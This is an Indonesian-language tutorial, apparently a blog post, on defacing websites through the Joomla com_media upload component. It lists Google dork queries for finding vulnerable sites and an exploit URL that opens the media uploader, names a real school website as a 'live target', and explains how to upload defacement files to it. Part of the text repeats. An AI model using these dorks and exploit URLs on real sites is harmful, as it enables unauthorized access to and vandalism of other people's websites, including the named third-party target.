Deface dengan teknik Com_media
1. Dorking di google
Dork:
inurl:com_media intext:"Upload"
inurl:com_media intext:"Upload"
inurl:com_media intext:"Upload" site:com
Exploit:
Contoh:
site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=
Exploit:
/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=
Contoh:
site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=
2. Cari target
Seperti biasa cari target untuk eksekusi mengexploit websitenya, sebagai contoh saya beri live target.
live target:
http://www.mutareteachers.ac.zw/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=
3. Upload file
File yang diupload hanya bisa gambar dan berformat .txt ya adik adik. Akses file yang diupload tadi tempatnya dimana kak ? tempatnya di :
site.com/images/namafilemu.txt
4. Done
kurang lebih contoh hasilnya seperti ini gan, gampang kan gan, oh iya agar text bisa lebih bagus agan bisa edit textnya di sini biar text nya terkesan lebih profisional :D
live target:
http://www.mutareteachers.ac.zw/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_images_image_intro&e_name=&asset=com_content&author=created_by&folder=
3. Upload file
File yang diupload hanya bisa gambar dan berformat .txt ya adik adik. Akses file yang diupload tadi tempatnya dimana kak ? tempatnya di :
site.com/images/namafilemu.txt
4. Done
kurang lebih contoh hasilnya seperti ini gan, gampang kan gan, oh iya agar text bisa lebih bagus agan bisa edit textnya di sini biar text nya terkesan lebih profisional :D
EmoticonEmoticon